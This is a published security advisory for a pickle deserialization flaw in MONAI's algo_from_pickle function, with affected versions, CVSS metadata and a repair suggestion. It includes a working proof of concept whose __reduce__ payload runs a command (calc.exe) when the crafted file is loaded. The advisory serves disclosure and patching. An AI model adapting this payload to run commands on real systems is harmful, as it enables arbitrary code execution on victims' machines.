GHSA-89GG-P5R5-Q6R4
Vulnerability from github – Published: 2026-04-07 20:17 – Updated: 2026-04-07 20:17
VLAI
Summary
MONAI: Unsafe functions lead to pickle deserialization rce
Details
Summary
The algo_from_pickle function in monai/auto3dseg/utils.py causes pickle.loads(data_bytes) to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities.
Details
poc
import pickle
import subprocess
class MaliciousAlgo:
def __reduce__(self):
return (subprocess.call, (['calc.exe'],))
malicious_algo_bytes = pickle.dumps(MaliciousAlgo())
attack_data = {
"algo_bytes": malicious_algo_bytes,
}
attack_pickle_file = "attack_algo.pkl"
with open(attack_pickle_file, "wb") as f:
f.write(pickle.dumps(attack_data))
Generate the malicious file "attack_algo.pkl" through POC.
from monai.auto3dseg.utils import algo_from_pickle
attack_pickle_file = "attack_algo.pkl"
result = algo_from_pickle(attack_pickle_file)
Ultimately, it will trigger pickle.load through a file to identify the command execution.
Causes of the vulnerability:
def algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any:
with open(pkl_filename, "rb") as f_pi:
data_bytes = f_pi.read()
data = pickle.loads(data_bytes)
Impact
Arbitrary code execution
Repair suggestions Verify the data source and content before deserializing, or use a safe deserialization method
Severity
7.6 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.5.1"
},
"package": {
"ecosystem": "PyPI",
"name": "monai"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-07T20:17:21Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nThe `algo_from_pickle` function in `monai/auto3dseg/utils.py` causes `pickle.loads(data_bytes)` to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities.\n\n### Details\npoc\n```\nimport pickle\nimport subprocess\nclass MaliciousAlgo:\n def __reduce__(self):\n return (subprocess.call, ([\u0027calc.exe\u0027],))\nmalicious_algo_bytes = pickle.dumps(MaliciousAlgo())\n\nattack_data = {\n \"algo_bytes\": malicious_algo_bytes, \n \n}\nattack_pickle_file = \"attack_algo.pkl\"\nwith open(attack_pickle_file, \"wb\") as f:\n f.write(pickle.dumps(attack_data))\n\n```\nGenerate the malicious file \"attack_algo.pkl\" through POC.\n\n```\nfrom monai.auto3dseg.utils import algo_from_pickle\n\n\nattack_pickle_file = \"attack_algo.pkl\"\nresult = algo_from_pickle(attack_pickle_file)\n```\nUltimately, it will trigger pickle.load through a file to identify the command execution.\n\n\u003cimg width=\"909\" height=\"534\" alt=\"image\" src=\"https://github.com/user-attachments/assets/071adbb7-3e40-4651-be48-abd2ce32470f\" /\u003e\n\nCauses of the vulnerability:\n```\ndef algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -\u003e Any:\n\n with open(pkl_filename, \"rb\") as f_pi:\n data_bytes = f_pi.read()\n data = pickle.loads(data_bytes)\n\n```\n\n\n\n### Impact\nArbitrary code execution\n\nRepair suggestions\nVerify the data source and content before deserializing, or use a safe deserialization method",
"id": "GHSA-89gg-p5r5-q6r4",
"modified": "2026-04-07T20:17:21Z",
"published": "2026-04-07T20:17:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-89gg-p5r5-q6r4"
},
{
"type": "PACKAGE",
"url": "https://github.com/Project-MONAI/MONAI"
},
{
"type": "WEB",
"url": "https://github.com/Project-MONAI/MONAI/releases/tag/1.5.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "MONAI: Unsafe functions lead to pickle deserialization rce"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…